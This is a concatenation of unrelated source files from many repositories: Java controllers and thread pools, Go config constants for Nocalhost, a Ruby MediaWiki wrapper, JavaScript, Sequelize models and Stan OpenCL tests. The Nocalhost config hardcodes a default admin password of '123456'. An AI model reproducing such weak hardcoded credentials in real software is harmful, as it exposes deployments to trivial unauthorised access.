public ResponseEntity<Object> delete(@PathVariable Long id) {
modYqpcMainService.deleteById(id);
return new ResponseEntity<>(HttpStatus.OK);
}
@Log("删除文档")
@ApiOperation("删除文档")
@DeleteMapping
@PreAuthorize("@el.check('pcdj:del')")
public ResponseEntity<Object> delete(@RequestBody Long[] ids) {
modYqpcMainService.deleteBatch(ids);
return new ResponseEntity<>(HttpStatus.OK);
}
}
|
lyzhang1999/nocalhost
|
internal/nhctl/app/application_config.go
|
<filename>internal/nhctl/app/application_config.go
package app
import (
"strconv"
"time"
)
const (
DefaultSideCarImage = "codingcorp-docker.pkg.coding.net/nocalhost/public/nocalhost-sidecar:syncthing"
DefaultDevImage = "codingcorp-docker.pkg.coding.net/nocalhost/public/minideb:latest"
DefaultWorkDir = "/home/nocalhost-dev"
DefaultLocalSyncDirName = "."
DefaultResourcesDir = "resources"
DefaultNhctlHomeDirName = ".nh/nhctl"
DefaultBinDirName = "bin"
DefaultLogDirName = "logs"
DefaultSyncLogFileName = "sync-port-forward-child-process.log"
DefaultApplicationSyncPortForwardPidFile = "sync-port-forward.pid"
DefaultBinSyncThingDirName = "syncthing"
DefaultBackGroundPortForwardLogFileName = "alone-port-forward-child-process.log"
DefaultApplicationOnlyPortForwardPidFile = "alone-port-forward.pid"
DefaultApplicationSyncPidFile = "syncthing.pid"
DefaultApplicationDirName = "application"
DefaultApplicationProfilePath = ".profile.yaml"
DefaultApplicationConfigDirName = ".nocalhost"
DefaultApplicationConfigName = "config.yaml"
DefaultNewFilePermission = 0700
DefaultClientGoTimeOut = time.Minute * 5
// nhctl init
// TODO when release
DefaultInitHelmGitRepo = "<EMAIL>:codingcorp/nocalhost/nocalhost.git"
DefaultInitHelmType = "helmGit"
DefaultInitWatchDeployment = "nocalhost-api"
DefaultInitWatchWebDeployment = "nocalhost-web"
DefaultInitNocalhostService = "nocalhost-web"
DefaultInitUserEmail = "<EMAIL>"
DefaultInitPassword = "<PASSWORD>"
DefaultInitAdminUserName = "<EMAIL>"
DefaultInitAdminPassWord = "123456"
DefaultInitName = "nocalhost"
DefaultInitWaitNameSpace = "nocalhost-reserved"
DefaultInitWaitDeployment = "nocalhost-dep"
// TODO when release
DefaultInitHelmResourcePath = "deployments/chart"
DefaultInitPortForwardTimeOut = time.Minute * 1
DefaultInitApplication = "{\"source\":\"git\",\"install_type\":\"rawManifest\",\"resource_dir\":[\"manifest/templates\"],\"application_name\":\"bookinfo\",\"application_url\":\"<EMAIL>:nocalhost/bookinfo.git\"}"
)
type NocalHostAppConfig struct {
PreInstall []*PreInstallItem `json:"onPreInstall" yaml:"onPreInstall"`
SvcConfigs []*ServiceDevOptions `json:"services" yaml:"services"`
Name string `json:"name" yaml:"name"`
Type AppType `json:"manifestType" yaml:"manifestType"`
ResourcePath []string `json:"resourcePath" yaml:"resourcePath"`
// old-config
//AppConfig *AppConfig `json:"app_config" yaml:"appConfig"`
}
type PreInstallItem struct {
Path string `json:"path" yaml:"path"`
Weight string `json:"weight" yaml:"weight"`
}
type ServiceDevOptions struct {
Name string `json:"name" yaml:"name"`
Type SvcType `json:"serviceType" yaml:"serviceType"`
GitUrl string `json:"gitUrl" yaml:"gitUrl"`
DevImage string `json:"devContainerImage" yaml:"devContainerImage"`
WorkDir string `json:"workDir" yaml:"workDir"`
Sync []string `json:"syncDirs" yaml:"syncDirs"`
Ignore []string `json:"ignores" yaml:"ignores"` // TODO Ignore file list
DevPort []string `json:"devPorts" yaml:"devPorts"`
Jobs []string `json:"dependJobsLabelSelector" yaml:"dependJobsLabelSelector,omitempty"`
Pods []string `json:"dependPodsLabelSelector" yaml:"dependPodsLabelSelector,omitempty"`
}
type ComparableItems []*PreInstallItem
func (a ComparableItems) Len() int { return len(a) }
func (a ComparableItems) Swap(i, j int) { a[i], a[j] = a[j], a[i] }
func (a ComparableItems) Less(i, j int) bool {
iW, err := strconv.Atoi(a[i].Weight)
if err != nil {
iW = 0
}
jW, err := strconv.Atoi(a[j].Weight)
if err != nil {
jW = 0
}
return iW < jW
}
func (n *NocalHostAppConfig) GetSvcConfig(name string) *ServiceDevOptions {
if n.SvcConfigs == nil {
return nil
}
for _, svc := range n.SvcConfigs {
if svc.Name == name {
return svc
}
}
return nil
}
|
molybdenum-99/mediawiktory
|
lib/mediawiktory/wikipedia/actions/refresheducation.rb
|
# frozen_string_literal: true
module MediaWiktory::Wikipedia
module Actions
# Rebuild summary data of Education Program objects.
#
# Usage:
#
# ```ruby
# api.refresheducation.ids(value).perform # returns string with raw output
# # or
# api.refresheducation.ids(value).response # returns output parsed and wrapped into Response object
# ```
#
# See {Base} for generic explanation of working with MediaWiki actions and
# {MediaWiktory::Wikipedia::Response} for working with action responses.
#
# All action's parameters are documented as its public methods, see below.
#
class Refresheducation < MediaWiktory::Wikipedia::Actions::Post
# The IDs of the objects to refresh.
#
# @param values [Array<Integer>]
# @return [self]
def ids(*values)
values.inject(self) { |res, val| res._ids(val) }
end
# @private
def _ids(value)
merge(ids: value.to_s, replace: false)
end
# Type of object to refresh.
#
# @param value [String] One of "org", "course", "student".
# @return [self]
def type(value)
_type(value) or fail ArgumentError, "Unknown value for type: #{value}"
end
# @private
def _type(value)
defined?(super) && super || ["org", "course", "student"].include?(value.to_s) && merge(type: value.to_s)
end
# A "csrf" token retrieved from action=query&meta=tokens
#
# @param value [String]
# @return [self]
def token(value)
merge(token: value.to_s)
end
end
end
end
|
leenlab2/TLI-server
|
src/main/java/com/caravantage/use_case_managers/Recommender.java
|
<gh_stars>1-10
package com.caravantage.use_case_managers;
import com.caravantage.car_recommendations.SetUpAccountHolder;
import com.caravantage.constants.RecommendationConstants;
import com.caravantage.data_access.AccountAccessInterface;
import com.caravantage.fetch_cars.BankingDataProcessor;
import com.caravantage.entities.AccountHolder;
import com.caravantage.entities.InputData;
import com.caravantage.fetch_cars.CarDataProcessor;
/**
* A use case class responsible for handling the generating a client's recommended cars and inserting
* the cars into our database
*/
public class Recommender {
AccountAccessInterface accountAccess;
BankingDataProcessor bankProcess;
CarDataProcessor carProcess;
public Recommender(AccountAccessInterface accountAccess,
BankingDataProcessor bankProcess, CarDataProcessor carProcess) {
this.accountAccess = accountAccess;
this.bankProcess = bankProcess;
this.carProcess = carProcess;
}
/**
* Follows our backend logic to generate a list of the best possible cars based on loans and saved to that client
* @param input the input sent in from our front end including the clients' IDs
*/
public void generateAndInsert(InputData input) {
// Generate and insert for every client ID given by front end
String clientIDsString = input.getClientIDs();
String[] clientIDs = clientIDsString.split(" ");
for (String id : clientIDs) {
AccountHolder user = new AccountHolder(id);
// Check to see if they have a current car they would like to trade in
if (input.getTradeInCar() != null){
user.setExistingCar(input.getTradeInCar());
user.setExistingCarValue((float) (carProcess.getCarByVin(user.getExistingCar()).getPrice() * RecommendationConstants.TRADE_DEPRECIATION_RATIO));
}
SetUpAccountHolder program = new SetUpAccountHolder(user, bankProcess, carProcess);
program.run();
accountAccess.insertRecommendedCars(user);
}
}
}
|
kkpenaranda/ITERAC_5
|
src/vos/IngresoZonaPorAdministrador.java
|
<filename>src/vos/IngresoZonaPorAdministrador.java
package vos;
import org.codehaus.jackson.annotate.JsonProperty;
public class IngresoZonaPorAdministrador {
@JsonProperty(value= "idAdministrador")
private Long idAdministrador;
@JsonProperty(value="contraseniaAdministrador")
private String contraseniaAdministrador;
@JsonProperty(value= "zona")
private Zona zona;
/**
* @param idAdministrador
* @param zona
*/
public IngresoZonaPorAdministrador(@JsonProperty(value= "idAdministrador") Long idAdministrador, @JsonProperty(value= "zona") Zona zona, @JsonProperty(value="contraseniaAdministrador") String contraseniaAdministrador) {
super();
this.idAdministrador = idAdministrador;
this.zona = zona;
this.contraseniaAdministrador= contraseniaAdministrador;
}
/**
* @return the idAdministrador
*/
public Long getIdAdministrador() {
return idAdministrador;
}
/**
* @param idAdministrador the idAdministrador to set
*/
public void setIdAdministrador(Long idAdministrador) {
this.idAdministrador = idAdministrador;
}
/**
* @return the zona
*/
public Zona getZona() {
return zona;
}
/**
* @param zona the zona to set
*/
public void setZona(Zona zona) {
this.zona = zona;
}
public String getContraseniaAdministrador() {
return contraseniaAdministrador;
}
public void setContraseniaAdministrador(String contraseniaAdministrador) {
this.contraseniaAdministrador = contraseniaAdministrador;
}
}
|
Filjo0/JavaRushTasks
|
1.JavaSyntax/src/com/javarush/task/task07/task0707/Solution.java
|
package com.javarush.task.task07.task0707;
import java.lang.reflect.Array;
import java.util.ArrayList;
/*
Что за список такой?
*/
public class Solution {
public static void main(String[] args) throws Exception {
ArrayList<String> list = new ArrayList<>();
list.add("1");
list.add("1");
list.add("1");
list.add("1");
list.add("1");
System.out.println(list.size());
for (int i = 0; i < list.size(); i++) {
System.out.println(list.get(i));
//напишите тут ваш код
}
}
}
|
sasano8/pyright
|
packages/pyright-internal/src/tests/samples/loops1.py
|
# This sample tests the type checker's ability to handle type
# inferences within loop constructs.
def bar(a: list):
pass
def func1():
data = None
for x in [2, 3]:
if not data:
data = [1, 2]
else:
# This should not generate an error because the
# type checker should be able to determine that
# data must be a list at this point in the code.
bar(data)
else:
# This should generate an error because the
# type checker should be able to determine that
# data must contain None at this point.
bar(data)
x = 20 + 20
def func2():
data = None
while x:
if not data:
data = [1, 2]
else:
# This should not generate an error because the
# type checker should be able to determine that
# data must be a list at this point in the code.
bar(data)
else:
# This should generate an error because the
# type checker should be able to determine that
# data must contain None at this point.
bar(data)
|
FreeSlave/resolve
|
examples/cli-uploader/client/index.js
|
import React from 'react'
import { render } from 'react-dom'
import { createResolveStore, ResolveReduxProvider } from 'resolve-redux'
import jsCookie from 'js-cookie'
import jwt from 'jsonwebtoken'
import App from './containers/App'
import Layout from './components/Layout'
const entryPoint = (clientContext) => {
const token = jsCookie.get('jwt')
const jwtObject =
token != null && token.constructor === String ? jwt.decode(token) : null
const store = createResolveStore(clientContext, {
redux: {
reducers: {
jwt: (token = {}) => token,
},
},
initialState: { jwt: jwtObject },
})
const appContainer = document.createElement('div')
document.body.appendChild(appContainer)
render(
<ResolveReduxProvider store={store} context={clientContext}>
<Layout jwt={jwtObject}>
<App store={store} CDNUrl={clientContext.cdnUrl} />
</Layout>
</ResolveReduxProvider>,
appContainer
)
}
export default entryPoint
|
javg15/sirh_backend
|
app/models/rhnominas.model.js
|
<reponame>javg15/sirh_backend
module.exports = function(sequelize, DataTypes) {
return sequelize.define('rhnominas', {
id: {
autoIncrement: true,
type: DataTypes.INTEGER,
allowNull: false,
primaryKey: true
},
quincenapago: {
type: DataTypes.DECIMAL(19, 4),
allowNull: false
},
numemp: {
type: DataTypes.STRING(5),
allowNull: false
},
nombreempleado: {
type: DataTypes.STRING(100),
allowNull: false
},
fechingcobaev: {
type: DataTypes.DATEONLY,
allowNull: false
},
antiguedad: {
type: DataTypes.STRING(25),
allowNull: false
},
clavecategoria: {
type: DataTypes.STRING(3),
allowNull: false
},
desccategoria: {
type: DataTypes.STRING(100),
allowNull: false
},
claveplantel: {
type: DataTypes.STRING(3),
allowNull: false
},
descplantel: {
type: DataTypes.STRING(100),
allowNull: false
},
clavect: {
type: DataTypes.STRING(10),
allowNull: false
},
nombrect: {
type: DataTypes.STRING(100),
allowNull: false
},
idqnavigini: {
type: DataTypes.INTEGER,
allowNull: false
},
idqnavigfin: {
type: DataTypes.INTEGER,
allowNull: false
},
qnainicio: {
type: DataTypes.STRING(6),
allowNull: false
},
qnafin: {
type: DataTypes.STRING(6),
allowNull: false
},
id_esquemapago: {
type: DataTypes.INTEGER,
allowNull: false
},
esquemapago: {
type: DataTypes.STRING(3),
allowNull: false
},
permensualneto: {
type: DataTypes.DECIMAL(19, 4),
allowNull: false
},
dedmensualneto: {
type: DataTypes.DECIMAL(19, 4),
allowNull: false
},
totmensualneto: {
type: DataTypes.DECIMAL(19, 4),
allowNull: false
},
compensacion: {
type: DataTypes.DECIMAL(19, 4),
allowNull: false
},
percquinbruto: {
type: DataTypes.DECIMAL(19, 4),
allowNull: false
},
deduquinbruto: {
type: DataTypes.DECIMAL(19, 4),
allowNull: false
},
totquinbruto: {
type: DataTypes.DECIMAL(19, 4),
allowNull: false
},
totmnbruto: {
type: DataTypes.DECIMAL(19, 4),
allowNull: false
},
id_sindicato: {
type: DataTypes.INTEGER,
allowNull: false
},
siglassindicato: {
type: DataTypes.STRING(15),
allowNull: false
},
id_tipoemp: {
type: DataTypes.INTEGER,
allowNull: false
},
tipoempleado: {
type: DataTypes.STRING(20),
allowNull: false
},
id_empfuncion: {
type: DataTypes.INTEGER,
allowNull: false
},
empfuncion: {
type: DataTypes.STRING(35),
allowNull: false
},
id_funcionpri: {
type: DataTypes.INTEGER,
allowNull: false
},
funcionpri: {
type: DataTypes.STRING(35),
allowNull: false
},
id_funcionsec: {
type: DataTypes.INTEGER,
allowNull: false
},
funcionsec: {
type: DataTypes.STRING(60),
allowNull: false
},
clavemotgralbaja: {
type: DataTypes.INTEGER,
allowNull: false
},
desmotgralbaja: {
type: DataTypes.STRING(75),
allowNull: false
},
interinopuro: {
type: DataTypes.INTEGER,
allowNull: false
},
orden: {
type: DataTypes.INTEGER,
allowNull: true
},
verificado: {
type: DataTypes.INTEGER,
allowNull: true
},
observaciones: {
type: DataTypes.STRING(1000),
allowNull: true
},
compensacionpa: {
type: DataTypes.DECIMAL(19, 4),
allowNull: true
},
rfc: {
type: DataTypes.STRING(15),
allowNull: true
},
id_usuarios_r: {
type: DataTypes.INTEGER,
allowNull: false,
defaultValue: 0
},
state: {
type: DataTypes.CHAR(1),
allowNull: false,
defaultValue: "A"
},
created_at: {
type: DataTypes.DATE,
allowNull: true
},
updated_at: {
type: DataTypes.DATE,
allowNull: true
}
}, {
sequelize,
tableName: 'rhnominas',
schema: 'public',
//timestamps: false
createdAt: 'created_at',
updatedAt: 'updated_at',
});
};
|
bayesmix-dev/math
|
test/unit/math/opencl/rev/scaled_inv_chi_square_lpdf_test.cpp
|
#ifdef STAN_OPENCL
#include <stan/math/opencl/rev.hpp>
#include <stan/math.hpp>
#include <gtest/gtest.h>
#include <test/unit/math/opencl/util.hpp>
#include <vector>
TEST(ProbDistributionsScaledInvChiSquare, error_checking) {
int N = 3;
Eigen::VectorXd y(N);
y << 0.3, 0.8, 1.0;
Eigen::VectorXd y_size(N - 1);
y_size << 0.3, 0.8;
Eigen::VectorXd y_value(N);
y_value << 0.3, NAN, 0.5;
Eigen::VectorXd nu(N);
nu << 0.3, 0.8, 1.0;
Eigen::VectorXd nu_size(N - 1);
nu_size << 0.3, 0.8;
Eigen::VectorXd nu_value1(N);
nu_value1 << 0.3, 0, 0.5;
Eigen::VectorXd nu_value2(N);
nu_value2 << 0.3, INFINITY, 0.5;
Eigen::VectorXd s(N);
s << 0.3, 0.8, 1.0;
Eigen::VectorXd s_size(N - 1);
s_size << 0.3, 0.8;
Eigen::VectorXd s_value1(N);
s_value1 << 0.3, 0, 0.5;
Eigen::VectorXd s_value2(N);
s_value2 << 0.3, INFINITY, 0.5;
stan::math::matrix_cl<double> y_cl(y);
stan::math::matrix_cl<double> y_size_cl(y_size);
stan::math::matrix_cl<double> y_value_cl(y_value);
stan::math::matrix_cl<double> nu_cl(nu);
stan::math::matrix_cl<double> nu_size_cl(nu_size);
stan::math::matrix_cl<double> nu_value1_cl(nu_value1);
stan::math::matrix_cl<double> nu_value2_cl(nu_value2);
stan::math::matrix_cl<double> s_cl(s);
stan::math::matrix_cl<double> s_size_cl(s_size);
stan::math::matrix_cl<double> s_value1_cl(s_value1);
stan::math::matrix_cl<double> s_value2_cl(s_value2);
EXPECT_NO_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_cl, s_cl));
EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_size_cl, nu_cl, s_cl),
std::invalid_argument);
EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_size_cl, s_cl),
std::invalid_argument);
EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_cl, s_size_cl),
std::invalid_argument);
EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_value_cl, nu_cl, s_cl),
std::domain_error);
EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_value1_cl, s_cl),
std::domain_error);
EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_value2_cl, s_cl),
std::domain_error);
EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_cl, s_value1_cl),
std::domain_error);
EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_cl, s_value2_cl),
std::domain_error);
}
auto scaled_inv_chi_square_lpdf_functor
= [](const auto& y, const auto& nu, const auto& s) {
return stan::math::scaled_inv_chi_square_lpdf(y, nu, s);
};
auto scaled_inv_chi_square_lpdf_functor_propto
= [](const auto& y, const auto& nu, const auto& s) {
return stan::math::scaled_inv_chi_square_lpdf<true>(y, nu, s);
};
TEST(ProbDistributionsScaledInvChiSquare, opencl_matches_cpu_small) {
int N = 3;
int M = 2;
Eigen::VectorXd y(N);
y << 0.3, 0.8, 1.0;
Eigen::VectorXd nu(N);
nu << 0.3, 0.8, 1.0;
Eigen::VectorXd s(N);
s << 0.3, 0.8, 1.0;
stan::math::test::compare_cpu_opencl_prim_rev(
scaled_inv_chi_square_lpdf_functor_propto, y, nu, s);
stan::math::test::compare_cpu_opencl_prim_rev(
scaled_inv_chi_square_lpdf_functor, y, nu, s);
}
TEST(ProbDistributionsScaledInvChiSquare, opencl_matches_cpu_small_y_negative) {
int N = 3;
int M = 2;
Eigen::VectorXd y(N);
y << 0.3, -0.8, 1.0;
Eigen::VectorXd nu(N);
nu << 0.3, 0.8, 1.0;
Eigen::VectorXd s(N);
s << 0.3, 0.8, 1.0;
stan::math::test::compare_cpu_opencl_prim_rev(
scaled_inv_chi_square_lpdf_functor, y, nu, s);
stan::math::test::compare_cpu_opencl_prim_rev(
scaled_inv_chi_square_lpdf_functor_propto, y, nu, s);
}
TEST(ProbDistributionsScaledInvChiSquare, opencl_broadcast_y) {
int N = 3;
double y_scal = 12.3;
Eigen::VectorXd nu(N);
nu << 0.5, 1.2, 1.0;
Eigen::VectorXd s(N);
s << 0.3, 0.8, 1.0;
stan::math::test::test_opencl_broadcasting_prim_rev<0>(
scaled_inv_chi_square_lpdf_functor, y_scal, nu, s);
stan::math::test::test_opencl_broadcasting_prim_rev<0>(
scaled_inv_chi_square_lpdf_functor_propto, y_scal, nu, s);
}
TEST(ProbDistributionsScaledInvChiSquare, opencl_broadcast_nu) {
int N = 3;
Eigen::VectorXd y(N);
y << 0.3, 0.8, 1.0;
double nu_scal = 12.3;
Eigen::VectorXd s(N);
s << 0.3, 0.8, 1.0;
stan::math::test::test_opencl_broadcasting_prim_rev<1>(
scaled_inv_chi_square_lpdf_functor, y, nu_scal, s);
stan::math::test::test_opencl_broadcasting_prim_rev<1>(
scaled_inv_chi_square_lpdf_functor_propto, y, nu_scal, s);
}
TEST(ProbDistributionsScaledInvChiSquare, opencl_broadcast_s) {
int N = 3;
Eigen::VectorXd y(N);
y << 0.3, 0.8, 1.0;
Eigen::VectorXd nu(N);
nu << 0.3, 0.8, 1.0;
double s_scal = 12.3;
stan::math::test::test_opencl_broadcasting_prim_rev<2>(
scaled_inv_chi_square_lpdf_functor, y, nu, s_scal);
stan::math::test::test_opencl_broadcasting_prim_rev<2>(
scaled_inv_chi_square_lpdf_functor_propto, y, nu, s_scal);
}
TEST(ProbDistributionsScaledInvChiSquare, opencl_matches_cpu_big) {
int N = 153;
Eigen::Matrix<double, Eigen::Dynamic, 1> y
= Eigen::Array<double, Eigen::Dynamic, 1>::Random(N, 1).abs();
Eigen::Matrix<double, Eigen::Dynamic, 1> nu
= Eigen::Array<double, Eigen::Dynamic, 1>::Random(N, 1).abs();
Eigen::Matrix<double, Eigen::Dynamic, 1> s
= Eigen::Array<double, Eigen::Dynamic, 1>::Random(N, 1).abs();
stan::math::test::compare_cpu_opencl_prim_rev(
scaled_inv_chi_square_lpdf_functor, y, nu, s);
stan::math::test::compare_cpu_opencl_prim_rev(
scaled_inv_chi_square_lpdf_functor_propto, y, nu, s);
}
#endif
|
prasannachinnapareddy/FullStactDevelopement
|
Secondlar.java
|
<reponame>prasannachinnapareddy/FullStactDevelopement<gh_stars>0
package com.cts.main;
import java.util.Scanner;
/*
Write a program in C to find the second largest element in an array.
Test Data :
Input the size of array : 5
Input 5 elements in the array :
element - 0 : 2
element - 1 : 9
element - 2 : 1
element - 3 : 4
element - 4 : 6
Expected Output :
The Second largest element in the array is : 6
*/
public class Secondlar
{
public static void main(String[] args)
{
int n,i,a[],sl,l;
Scanner s=new Scanner(System.in);
n=s.nextInt();
a=new int[n];
for(i=0;i<n;i++)
{
a[i]=s.nextInt();
System.out.println("elements in array:"+a[i]);
}
l=sl=a[0];
for(i=0;i<n;i++)
{
if(a[i]>l)
{
sl=l;
l=a[i];
}
else if(a[i]>sl && a[i]<l)
sl=a[i];
}
System.out.println("secondlarge num is:"+sl);
}
}
|
liyork/violin
|
violin-utils/src/main/java/com/wolf/utils/redis/threadpool/CommonThreadPool.java
|
/**
* Description: CommonThreadPool.java
* All Rights Reserved.
*/
package com.wolf.utils.redis.threadpool;
import java.io.IOException;
import java.io.InputStream;
import java.lang.management.ManagementFactory;
import java.text.SimpleDateFormat;
import java.util.Collection;
import java.util.Date;
import java.util.Properties;
import java.util.concurrent.*;
import java.util.concurrent.atomic.AtomicInteger;
/**
*
* 异步执行公共线程池,此线程池的配置可参见threadPoolConfig.properties文件中的注释
* <br/> Created on 2012-9-24 上午09:30:31
* @since 1.0
*/
public final class CommonThreadPool {
// private static final Logger logger = LoggerFactory.getLogger(CommonThreadPool.class);
public static final String LONG_FORMAT="yyyy-MM-dd HH:mm:ss";
private static ExecutorService execute = init();
private static final long EXECUTETIME = 10000L;
private CommonThreadPool(){
}
/**
* 异步执行公共执行方法
* @param command
* @return future,返回异步等待对象
*/
public static Future<Object> execute(IAsynchronousHandler command){
ThreadPoolAdaptor handler = new ThreadPoolAdaptor(command,EXECUTETIME);
Future<Object> future = execute.submit(handler);
return future;
}
/**
* 关闭线程池
* Description:
* @return
*/
@SuppressWarnings("unused")
private static boolean shutDown(){
if(execute != null){
execute.shutdown();
return true;
}
return false;
}
/**
* 获取线程池对象
*
* <br/> Created on 2013-10-9 上午10:07:47
* @since 3.2
* @param name,线程池名称创建线程名称
* @return
*/
public static ThreadPoolExecutorExtend getThreadPool(ThreadPoolParameterVO vo){
int corePoolSize = vo.getCorePoolSize();
int maximumPoolSize = vo.getMaximumPoolSize();
int initialCapacity = vo.getInitialCapacity();
long keepAliveTime = vo.getKeepAliveTime();
String threadName = vo.getThreadName();
//增加构造队列容量参数
TaskQueue taskqueue = new TaskQueue(initialCapacity , vo.isDiscard());
ThreadPoolExecutorExtend executeNew = new ThreadPoolExecutorExtend(corePoolSize, maximumPoolSize,
keepAliveTime, TimeUnit.SECONDS,
taskqueue,new TaskThreadFactory(threadName) , new ThreadPlloRejectedExecutionHandler(vo.isDiscard()));
taskqueue.setParent(executeNew);
// startThreadMonitor();
return executeNew;
}
private static ExecutorService init(){
Properties ps = getThreadPoolConfig();
if(ps == null){
throw new NullPointerException("找不到 threadpool 配置文件!");
}
int corePoolSize = Integer.parseInt(ps.getProperty("corePoolSize","5"));
int maximumPoolSize = Integer.parseInt(ps.getProperty("maximumPoolSize","120"));
int initialCapacity = Integer.parseInt(ps.getProperty("initialCapacity","20000"));
long keepAliveTime = Long.parseLong(ps.getProperty("keepAliveTime","120"));
String threadName = ps.getProperty("threadName", "base-framework-threadPool-");
ThreadPoolParameterVO vo = new ThreadPoolParameterVO();
vo.setCorePoolSize(corePoolSize);
vo.setMaximumPoolSize(maximumPoolSize);
vo.setInitialCapacity(initialCapacity);
vo.setKeepAliveTime(keepAliveTime);
vo.setMaximumPoolSize(maximumPoolSize);
vo.setThreadName(threadName);
vo.setDiscard(false);
return getThreadPool(vo);
}
private static Properties getThreadPoolConfig(){
Properties ps = new Properties();
InputStream in = CommonThreadPool.class.getResourceAsStream("/threadPoolConfig.properties");
if(in == null){
return null;
}
try {
ps.load(in);
} catch (IOException e) {
throw new RuntimeException(e);
}
return ps;
}
/**
* 是否大于内存限制的阀值
* @return
*/
public static boolean isMemoryThreshold(){
long size = ManagementFactory.getMemoryMXBean().getHeapMemoryUsage().getUsed();
long thresholdSize = (long) (ManagementFactory.getMemoryMXBean().getHeapMemoryUsage().getMax() * 0.7) ;
if(size > thresholdSize){
return true ;
}
return false ;
}
/**
* 线程工厂
* Description:
* All Rights Reserved.
*/
static class TaskThreadFactory implements ThreadFactory {
final ThreadGroup group;
final AtomicInteger threadNumber = new AtomicInteger(1);
final String namePrefix;
TaskThreadFactory(String namePrefix) {
SecurityManager s = System.getSecurityManager();
group = (s != null) ? s.getThreadGroup() : Thread.currentThread().getThreadGroup();
this.namePrefix = namePrefix;
}
public Thread newThread(Runnable r) {
Thread t = new Thread(group, r, namePrefix + threadNumber.getAndIncrement());
t.setDaemon(true);
if (t.getPriority() != Thread.NORM_PRIORITY){
t.setPriority(Thread.NORM_PRIORITY);
}
return t;
}
}
/**
* 自定义线程创建方法
* Description:
* All Rights Reserved.
*/
static class TaskQueue extends LinkedBlockingQueue<Runnable> {
/**
*
*/
private static final long serialVersionUID = -3966913824895982184L;
ThreadPoolExecutorExtend parent = null;
boolean isDiscard = true;
public TaskQueue() {
super();
}
public TaskQueue(int initialCapacity) {
super(initialCapacity);
}
public TaskQueue(int initialCapacity , boolean isDiscard) {
super(initialCapacity);
this.isDiscard = isDiscard ;
}
public TaskQueue(Collection<? extends Runnable> c) {
super(c);
}
public void setParent(ThreadPoolExecutorExtend tp) {
parent = tp;
}
public boolean force(Runnable o) {
if ( parent.isShutdown() ) {
throw new RejectedExecutionException("Executor not running, can't force a command into the queue");
}
return super.offer(o); //forces the item onto the queue, to be used if the task is rejected
}
public boolean offer(Runnable o) {
//we can't do any checks
if (parent==null) {
return super.offer(o);
}
//内存限制
if(this.isDiscard && isMemoryThreshold()){
return false ;
}
//we are maxed out on threads, simply queue the object
if (parent.getPoolSize() == parent.getMaximumPoolSize()){
return super.offer(o);
}
//we have idle threads, just add it to the queue
//note that we don't use getActiveCount(), see BZ 49730
AtomicInteger submittedTasksCountNew = parent.submittedTasksCount;
if (submittedTasksCountNew != null && submittedTasksCountNew.get() <= parent.getPoolSize()) {
return super.offer(o);
}
//if we have less threads than maximum force creation of a new thread
if ( parent.getPoolSize() < parent.getMaximumPoolSize()) {
return false;
}
//if we reached here, we need to add it to the queue
return super.offer(o);
}
/**
* 执行父类的offer 操作
*
* <br/> Created on 2016-11-4 下午9:53:51
* @since 4.1
* @param o
* @return
* @throws InterruptedException
*/
public boolean superOffer(Runnable o) throws InterruptedException{
return super.offer(o);
}
}
/**
* 自定义线程池任务终止实现
* @author lhb
*
*/
static class ThreadPlloRejectedExecutionHandler implements RejectedExecutionHandler{
boolean isDiscard = true;
public ThreadPlloRejectedExecutionHandler(){}
public ThreadPlloRejectedExecutionHandler(boolean isDiscard){
this.isDiscard = isDiscard;
}
@SuppressWarnings("rawtypes")
@Override
public void rejectedExecution(Runnable r, ThreadPoolExecutor executor) {
//没有到内存阀值,执行如下
if(!this.isDiscard || (this.isDiscard && !isMemoryThreshold())){
//判断是不是并发情况导致的失败
try {
boolean reAdd = false ;
BlockingQueue q = executor.getQueue() ;
if(q instanceof TaskQueue){
reAdd = ((TaskQueue) q).superOffer(r);
}else{
reAdd = executor.getQueue().offer(r);
}
// boolean reAdd = executor.getQueue().offer(r, 3, TimeUnit.MILLISECONDS);
if(reAdd){
return ;
}
} catch (InterruptedException e) {
e.printStackTrace();
}catch(Throwable e){
throw new RejectedExecutionException(e);
}
}
if(r instanceof CommonFutureTask){
IAsynchronousHandler handlerAdaptor = ((CommonFutureTask) r).getR();
if(handlerAdaptor == null){
System.out.println("CommonThreadPool 以达到队列容量上限:"+r.toString());
//lhb to 2015.3.11
throw new RejectedExecutionException();
}
}
try{
if(r instanceof CommonFutureTask){
IAsynchronousHandler handlerAdaptor = ((CommonFutureTask) r).getR();
//获取真实的handler ,记录日志
IAsynchronousHandler handler = null;
if(handlerAdaptor instanceof ThreadPoolAdaptor){
handler = ((ThreadPoolAdaptor) handlerAdaptor).getHandler();
if(handler == null){
handler = handlerAdaptor;
}
}else{
handler = handlerAdaptor ;
}
StringBuilder sb = new StringBuilder();
sb.append("任务名称:").append(handler.getClass());
sb.append("。happenTime=").append(formateDate());
sb.append("。toString=").append(handler.toString());
System.out.println("CommonThreadPool 以达到队列容量上限:"+sb.toString());
}else{
StringBuilder sb = new StringBuilder();
sb.append("任务名称:").append(r.getClass());
sb.append("。happenTime=").append(formateDate());
sb.append("。toString=").append(r.toString());
System.out.println("CommonThreadPool 以达到队列容量上限:"+sb.toString());
}
//自定义线程池,执行
if(executor instanceof ThreadPoolExecutorExtend){
((ThreadPoolExecutorExtend) executor).getSubmittedTasksCount().decrementAndGet();
}
}catch (Throwable e) {
e.printStackTrace() ;
throw new RejectedExecutionException(e);
}
//lhb to 2015.3.11
throw new RejectedExecutionException();
}
private String formateDate(){
Date date = new Date();
SimpleDateFormat sdf = new SimpleDateFormat(LONG_FORMAT);
String result = sdf.format(date);
return result ;
}
}
}
|
robindiddams/handlebars.js
|
spec/expected/empty.amd.simple.js
|
{"compiler":[8,">= 4.3.0"],"main":function(container,depth0,helpers,partials,data) {
return "";
},"useData":true}
|
sofa-framework/issofa
|
SofaKernel/modules/SofaLoader/BaseVTKReader.inl
|
/******************************************************************************
* SOFA, Simulation Open-Framework Architecture, development version *
* (c) 2006-2017 INRIA, USTL, UJF, CNRS, MGH *
* *
